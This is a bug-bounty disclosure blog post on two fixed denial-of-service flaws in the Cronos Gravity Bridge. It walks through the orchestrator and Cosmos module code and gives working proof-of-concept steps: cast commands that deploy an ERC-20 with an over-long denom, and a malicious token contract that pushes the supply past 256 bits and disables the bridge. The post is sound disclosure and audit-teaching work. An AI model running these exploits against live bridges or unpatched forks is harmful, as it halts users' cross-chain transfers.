Halting the Cronos Gravity Bridge

December 11, 2023

In January 2023, I found and reported two separate bugs to the Cronos Gravity Bridge project on Immunefi. The first bug would allow an attacker to halt all cross-chain transfers from Ethereum to Cronos (one-way). The second bug would allow an attacker to disable the bridge entirely.

This project has since been taken down from Immunefi, however the Sommelier project has put up a bounty program for their own Gravity Bridge now, which you can find here.

If you're after a high quality audit, please contact Zellic to set one up!

Table of Contents

Setting up a local testing environment

The Cronos team was running the Gravity Bridge on their own testnet, and I obviously couldn't perform any testing on there and risk halting the chain. I remember having a lot of trouble setting up the local testing environment, because it was my first time dealing with a multi-chain system.

This section summarizes the steps I took to get the entire gravity bridge running locally for testing purposes. Hopefully this is useful to any readers planning to audit similar codebases.

Note: all testing was done against commit 155515ccdfc03a1376385113d2fc6919510d25ac (not exactly this commit, but this one will work).

To get a clean starting environment, I added the following integration test. This simply did the minimal setup (such as deploying contracts, setting up validators, etc) and then let me test however I wanted:

// Save as `integration_tests/sandbox_test.go`
package integration_tests

func (s *IntegrationTestSuite) TestSandbox() {
	s.Run("Bring up chain and see what happens", func() {
		s.T().Log("Chain established. Looping forever now...")

		for {
		}
	})
}

I also modified the Makefile and added the following:

e2e_sandbox: e2e_clean_slate
	integration_tests/integration_tests.test -test.failfast -test.v -test.run IntegrationTestSuite -testify.m TestSandbox || make -s fail

I could now bring the gravity bridge online with the following command:

$ ARCHIVE_NODE_URL=your_mainnet_node_url make e2e_sandbox

High level overview of the Gravity Bridge

The Gravity Bridge consists of three main components:

  1. The smart contracts
  2. The x/gravity Cosmos module
  3. The orchestrators

Since this is a bridge, users are able to transfer tokens from Ethereum to Cronos, or vice versa. In either case, the functionality works as follows:

  • Ethereum to Cronos:

    1. User calls sendToCronos() on the Gravity.sol smart contract on Ethereum. This function emits a SendToCosmosEvent event.
    2. The orchestrators watch for these events. Once seen, they execute the MsgSubmitEthereumEvent message handler on the x/gravity Cosmos module to submit this event for processing.
    3. In the Cosmos module, this message causes a new event structure to either a) be created, or b) have a vote added to it. After each block is generated, the EndBlocker() function tallies up all votes from all validators for all events, and if enough votes are acquired, the event is processed.
  • Cronos to Ethereum:

    1. User executes the MsgSendToEthereum message in the Cosmos module. This deducts coins from the user's account and adds this cross-chain transfer to be processed. The BeginBlocker() function batches up multiple transfers into one unsigned transaction.
    2. The orchestrators periodically query for unsigned transaction batches using the UnsignedBatchTxsRequest query. They then sign and broadcast a transaction that calls the Gravity.sol contract's submitBatch() function.
    3. The submitBatch() function on the Gravity.sol contract distributes the tokens to the respective users.

Note that there are some other funtionalities (one of them is described below), but they all largely work in the same way.

Vulnerability 1 - Incorrect check for ERC-20 deploy events

Preliminary information

Within the Gravity.sol contract, there exists the deployERC20() function. Any user can use this function to deploy their own ERC-20 contract that can then be used for cross-chain token transfers through the gravity bridge.

This function deploys a new CosmosERC20 contract on behalf of the user, and then emits a ERC20DeployedEvent event that is handled later by the x/gravity Cosmos module (Code here):

function deployERC20(
    string calldata _cosmosDenom,
    string calldata _name,
    string calldata _symbol,
    uint8 _decimals
) external {
    // Deploy an ERC20 with entire supply granted to Gravity.sol
    CosmosERC20 erc20 = new CosmosERC20(address(this), _name, _symbol, _decimals);

    // Fire an event to let the Cosmos module know
    state_lastEventNonce = state_lastEventNonce + 1;
    emit ERC20DeployedEvent(
        _cosmosDenom,
        address(erc20),
        _name,
        _symbol,
        _decimals,
        state_lastEventNonce
    );
}

The _cosmosDenom argument is the denomination of the coin that is to be created on the Cronos side. A coin denomination is a unique identifier for a specific token in Cosmos-based chains.

One of the key fields within this emitted event is the nonce field, which is set to state_lastEventNonce in the above code. This nonce is unconditionally incremented any time an event is emitted by this contract.

The orchestrators watch for this (and many other) events. For each event, it generates a MsgSubmitEthereumEvent message and executes it on the Cosmos module. If the message execution is successful, the Cosmos module increments it's own lastEventNonce state variable.

Crucially, this Cosmos lastEventNonce is queried by the orchestrator in the ethereum_event_watcher::check_for_events() function. If it notices that the event nonce from the Ethereum event it is currently processing doesn't match the event nonce queried from the Cosmos module, it continues to wait for Cosmos blocks to be mined before checking again. This means that the code assumes that the event nonces will always increase atomically on both chains (Code here):

let mut new_event_nonce = get_last_event_nonce(grpc_client, our_cosmos_address).await?;

while new_event_nonce != last_message_nonce {
    if error_count == 10 {
        return Err(GravityError::InvalidBridgeStateError(
            format!("Claims did not process, trying to update but still on event nonce {},\
                retrying from block {} to block {} in a moment"
                    , new_event_nonce , starting_block , ending_block),
        ));
    }
    info!("Waiting for claims to process, current on event nonce {}, trying to update to {}"
        , new_event_nonce, last_message_nonce);

    error_count += 1;
    contact.wait_for_next_block(timeout).await?;
    new_event_nonce = get_last_event_nonce(grpc_client, our_cosmos_address).await?;
}

If we can cause a mismatch between the nonces, then this code would loop forever and get stuck.

Since the Gravity.sol smart contract always either a) reverts, or b) unconditionally increments the nonce, the only other place to look for a bug is within the Cosmos module.

The vulnerability - causing a mismatch between nonces

The MsgSubmitEthereumEvent message handler's code starts off as follows:

func (k msgServer) SubmitEthereumEvent(c context.Context, msg *types.MsgSubmitEthereumEvent) (*types.MsgSubmitEthereumEventResponse, error) {
	ctx := sdk.UnwrapSDKContext(c)

	event, err := types.UnpackEvent(msg.Event)
	if err != nil {
		return nil, err
	}

	// [ ... ]

	return &types.MsgSubmitEthereumEventResponse{}, nil
}

When UnpackEvent(msg.Event) is called, it will take the inner event (in this case, the ERC20DeployedEvent event), and attempt to validate it. If validation fails, this code returns an error and never increases the Cosmos module's lastEventNonce. Code here:

func UnpackEvent(any *types.Any) (EthereumEvent, error) {
	// [ ... ]

	if err := event.Validate(); err != nil {
		return nil, sdkerrors.Wrapf(sdkerrors.ErrUnpackAny, "invalid EthereumEvent %+v", event)
	}

	return event, nil
}

Now, can we cause the validation to fail? Let's take a look at the code:

func (e20de *ERC20DeployedEvent) Validate() error {
	// [ ... ]
	if err := sdk.ValidateDenom(e20de.CosmosDenom); err != nil {
		return err
	}
	return nil
}

This code tries to validate the CosmosDenom field of the event, which we control. Looking at the Cosmos-SDK code, it is evident that we can easily cause validation to fail:

var (
	// Denominations can be 3 ~ 128 characters long and support letters, followed by either
	// a letter, a number or a separator ('/').
)

Proof of concept exploit

To showcase an exploit, I used Foundry's cast to deploy an ERC-20 with the CosmosDenom set to a string longer than 128 characters.

The private key for one of the validators as well as the address of the deployed Gravity.sol contract can be fetched from one of the other tests, or from the terminal output when starting up the local environment:

$ cast send --private-key $PRIV_KEY --rpc-url http://localhost:8545 $GRAVITY_ADDR "deployERC20(string,string,string,uint8)" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAA" 0

Once you do this, all of the orchestrator container's logs will be filled with the following errors:

2023-01-03T16:37:39.593002Z ERROR cosmos_gravity::send: Error during gRPC call to Cosmos containing 2 messages of types {"/gravity.v1.MsgSubmitEthereumEvent"}: CosmosGrpcError(RequestError { error: Status { code: Unknown, message: "invalid EthereumEvent event_nonce:5 cosmos_denom:\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" token_contract:\"0x39c3a55f68bf9f2992776991f25aac6813a4f1d0\" erc20_name:\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" erc20_symbol:\"AAA\" ethereum_height:13405669 : failed unpacking protobuf message from Any [PeggyJV/gravity-bridge/module/x/gravity/types/codec.go:116] With gas wanted: '0' and gas used: '6666' ", metadata: MetadataMap { headers: {"content-type": "application/grpc", "x-cosmos-block-height": "284"} } } })

2023-01-03T16:37:39.541526Z ERROR orchestrator::main_loop: Failed to get events for block range, Check your Eth node and Cosmos gRPC InvalidBridgeStateError("Claims did not process, trying to update but still on event nonce 4,retrying from block 13405664 to block 13405762 in a moment")

After this, no new events emitted by the Gravity.sol contract can ever be processed by the orchestrators, as they will all be stuck in an infinite loop.

The fix

The Cronos team determined that this was a Medium severity issue, as it temporarily halted Ethereum -> Cronos cross-chain communication. All other bridge functionality continued to work as intended.

The issue was fixed by moving the ValidateDenom check to the verifyERC20DeployedEvent() function. This function runs later on when events are processed, and if validation fails then, the bridge continues functioning as intended. Here is the fix commit.

Vulnerability 2 - Malicious token causes bridge to be deactivated

Preliminary information

As I mentioned before, events are handled through the EndBlocker() function. Specifically, the chain of calls is as follows:

EndBlocker -> eventVoteRecordPruneAndTally -> TryEventVoteRecord -> 
processEthereumEvent -> Handle

When auditing the code, I noticed that the processEthereumEvent() function had the following code:

func (k Keeper) processEthereumEvent(ctx sdk.Context, event types.EthereumEvent) {
	// then execute in a new Tx so that we can store state on failure
	xCtx, commit := ctx.CacheContext()
	if err := k.Handle(xCtx, event); err != nil { // execute with a transient storage
		k.DisableBridge(ctx)
		// [ ... ]
	}
}

So, when handling an event, if k.Handle() ever returns an error, the entire bridge is disabled.

Therefore, I set my sights on figuring out how to cause k.Handle() to return an error.

The vulnerability - Malicious token supply causes an error to be returned

Within the Handle() function, it processes a lot of events. Of interest though, is the SendToCosmosEvent, which is handled as follows:

func (k Keeper) Handle(ctx sdk.Context, eve types.EthereumEvent) (err error) {
	switch event := eve.(type) {
	case *types.SendToCosmosEvent:
		// Check if coin is Cosmos-originated asset and get denom
		isCosmosOriginated, denom := k.ERC20ToDenomLookup(ctx, common.HexToAddress(event.TokenContract))
		addr, _ := sdk.AccAddressFromBech32(event.CosmosReceiver)
		coins := sdk.Coins{sdk.NewCoin(denom, event.Amount)}

		if !isCosmosOriginated {
			if err := k.DetectMaliciousSupply(ctx, denom, event.Amount); err != nil {
				return err
			}
            // [ ... ]
        }
        // [ ... ]
    }
    // [ ... ]
}

The code first determines if the token being sent originates from Cosmos itself. If it doesn't, it checks to see if a malicious supply is detected. If so, it returns an error.

The malicious supply check is as follows:

func (k Keeper) DetectMaliciousSupply(ctx sdk.Context, denom string, amount sdk.Int) (err error) {
	currentSupply := k.bankKeeper.GetSupply(ctx, denom)
	newSupply := new(big.Int).Add(currentSupply.Amount.BigInt(), amount.BigInt())
	if newSupply.BitLen() > 256 {
		return sdkerrors.Wrapf(types.ErrSupplyOverflow, "malicious supply of %s detected", denom)
	}

	return nil
}

Here, the amount is the amount field from the emitted SendToCosmosEvent event. If we can get the newSupply to ever be larger than a 256-bit integer, the code will error out and subsequently disable the bridge.

It is crucial to also note that this is only possible because the sendToCronos() function within the Gravity.sol contract never checks to see if the token being sent is whitelisted in any way. This allows an attacker to deploy their own malicious token, and then send tokens in such a way to cause DetectMaliciousSupply() to fail and return with an error.

Proof of concept exploit

To showcase an exploit, I deployed the following contract in the local testing environment:

pragma solidity 0.8.0;

contract MaliciousGravityToken {
    uint256 amount = 0;

    function balanceOf(address) external view returns (uint256 balance) {
        balance = amount;
    }

    function transferFrom(address, address, uint256 _amount) external {
        if (amount == 0) {
            amount = _amount;
        } else {
            amount = 0;
        }
    }
}
$ forge create --private-key $PRIV_KEY --rpc-url http://localhost:8545 src/MaliciousGravityToken.sol:MaliciousGravityToken

Deployed to: 0xe4559da99d5b420E440E06fDd19de35f930BbdbF

What this contract does is simple - it returns a balance of 0 initially, and then after transferFrom() is called, it will return whatever amount was transferred as the second balance.

When sendToCronos() is called with the amount set to 2**256 - 1, it causes the code to emit an event that sets the amount to 115792.....639935:

$ cast send --private-key $PRIV_KEY --rpc-url http://localhost:8545 $GRAVITY_ADDR "sendToCronos(address,address,uint256)" $TOKEN_ADDR $VAL_ADDR 115792089237316195423570985008687907853269984665640564039457584007913129639935

We can check the gravity0 container logs to verify the new token supply:

9:02AM INF minted coins from module account amount=115792089237316195423570985008687907853269984665640564039457584007913129639935gravity0xe4559da99d5b420E440E06fDd19de35f930BbdbF from=gravity module=x/bank

After this, we just need to perform one more transfer to cause the supply to go above 2**256.

First, I perform a zero-amount transfer. This resets the amount storage variable to 0. Then, I called sendToCronos() again in the same way:

$ cast send --private-key $PRIV_KEY --rpc-url http://localhost:8545 $TOKEN_ADDR "transferFrom(address,address,uint256)" $VAL_ADDR $VAL_ADDR 0

$ cast send --private-key $PRIV_KEY --rpc-url http://localhost:8545 $GRAVITY_ADDR "sendToCronos(address,address,uint256)" $TOKEN_ADDR $VAL_ADDR 115792089237316195423570985008687907853269984665640564039457584007913129639935

After this, the logs of the gravity0 container shows that the bridge is disabled:

9:04AM INF BridgeActivate is set to false module=x/gravity
9:04AM ERR ethereum event vote record failed cause="malicious supply of gravity0xe4559da99d5b420E440E06fDd19de35f930BbdbF detected: malicious ERC20 with invalid supply sent over bridge" event type=*types.SendToCosmosEvent id="\x05\x00\x00\x00\x00\x00\x00\x00\x04�P\x14#rgK�typ�\x10�\u058bI�CH\t��Y�S����S�" module=x/gravity nonce=4

The fix

The Cronos team determined this to be a Medium severity vulnerability as well. They explained that although they overlooked this situation where an attacker could maliciously disable any time they'd want, the bridge being disabled is itself the correct behavior here.

The issue was fixed by returning nil instead of an error when a malicious supply is detected. Here is the fix commit.

Conclusion

This was my first foray into hunting for bugs in a bridge, and I faced a lot of difficulties with getting the testing environment set up. I hope this blog post helps readers start hunting for bugs in similar cross-chain systems. These types of vulnerabilities are generally more unique than smart contract vulnerabilities in my experience, which makes them all the more fun to discover.

As always, if you're after a high quality audit, please contact Zellic to set one up!


Profile picture

Hello! I am Faraz, a Web3 auditor at Zellic. I used to be a Chrome + Android vulnerability researcher in a previous life. Follow me on twitter!

You can find my old vulnerability research blog here.